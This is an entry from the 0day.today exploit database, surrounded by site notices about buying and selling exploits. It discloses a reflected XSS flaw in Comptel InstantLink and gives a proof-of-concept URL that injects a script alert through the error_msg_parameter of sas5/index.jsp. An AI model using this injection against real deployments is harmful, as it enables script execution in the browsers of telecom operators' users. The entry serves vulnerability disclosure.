0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Comptel InstantLink XSS vulnerability
===================================== Comptel InstantLink XSS vulnerability ===================================== -------------------------------------------------------------------- # Exploit Title: Comptel InstantLink" XSS vulnerability # Date: 24 Feb 2010 # Author: thebluegenius # Software Link: http://www.comptel.com/ProvisioningActivation/ # Version: All # CVE : NA --------------------------------------------------- "Comptel InstantLink" XSS vulnerability. --------------------------------------------------- Product Name: Comptel Instant Link System Vendor :http://www.comptel.com/ProvisioningActivation/ Description: Comptel InstantLink automates the user provisioning and service activation processes. It covers the entire provisioning workflow - from order entry to billable service. The product suffers from XSS vulnerability. Presently this product is deployed to over 280 Telecom customers with 800+ million subscribers across the world. ------------------ Vulnerability: XSS ------------------ you can execute XSS as given below: http://IPaddress:port/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E ----------------------------------------------------- # 0day.today [2024-11-14] #